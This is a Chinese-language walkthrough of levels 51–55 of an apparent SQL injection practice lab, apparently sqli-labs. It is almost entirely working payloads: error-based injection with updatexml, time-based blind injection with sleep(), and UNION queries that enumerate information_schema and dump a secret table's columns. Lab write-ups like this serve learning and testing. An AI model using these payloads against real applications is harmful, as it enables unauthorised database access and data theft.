第51关（报错注入  '  闭合）

查数据库

?sort=1%27%20and%20updatexml(1,concat(1,database()),3)--+

查表

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

第52关（时间盲注）

查数据库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)

第一个字符为s

?sort=1 and if(ascii(substr(database(),2,1))=101,sleep(3),1)

后面以此类推得到完整的数据库名

第53关（时间盲注 ' 闭合）

这关和上一关一样，只是换了个闭合方式

查数据库

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

后面也是以此类推

第54关（ ' 闭合）

查数据库名

?id=-1' union select 1,database(),3 --+

查表名

?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3 --+

查字段
 

?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='6w1j1i83b0'),3 --+

查内容

?id=-1' union select 1,(select group_concat(id,sessid,secret_AIXS,tryy)from 6w1j1i83b0),3 --+

第55关（ 括号）闭合）

查数据库

?id=-1) union select 1,database(),3 --+

查表

?id=-1) union select 1,(select table_name from information_schema.tables where table_schema=database()),3 --+

查字段

?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='6w1j1i83b0'),3 --+

查数据
 

?id=-1) union select 1,(select group_concat(id,sessid,secret_AIXS,tryy)from 6w1j1i83b0),3 --+